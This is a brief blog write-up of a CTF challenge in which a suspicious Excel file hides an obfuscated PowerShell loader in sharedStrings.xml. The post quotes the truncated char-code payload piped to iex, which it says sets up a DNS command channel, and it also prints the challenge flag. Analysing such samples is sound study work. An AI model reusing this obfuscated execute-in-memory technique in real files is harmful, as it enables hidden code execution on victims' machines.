Hi mates,

During my spare time i have tried some tasks from DSC17 CTF by S21sec. I will comment here on those in which I found more difficult or fun. FBCTF was present as platform so from here tasks names will be countries associated.

Finlandia – 400 points 

I have an Excel suspicious file as title says and first thing is uncompress or extract contents. So use binwalk, rename as zip or whatever. Inside we have a vba bin file. We can use oledump.py to view its contents.

After some time trying to decompress and decode vba bin file , seems no exit so i ‘ve start to search for other files. I have see one in particular. sharedStrings.xml :

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="1" uniqueCount="1"><si><t>('83G116G97B114E1...[]...C112B116B98B108C111H99H107C32G123H1'.SplIt('BHECG')|%{([Char][Int]$_)} )-Join''|iex|out-null</t></si></sst>

So, this is powershell obfuscated code, let’s try to see it’s contents.

It creates a DNS client to pass commands on powershell.  Flag is “f25a2fc72690b780b2a14e140ef6a9e0”

No hay contenido relacionado

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *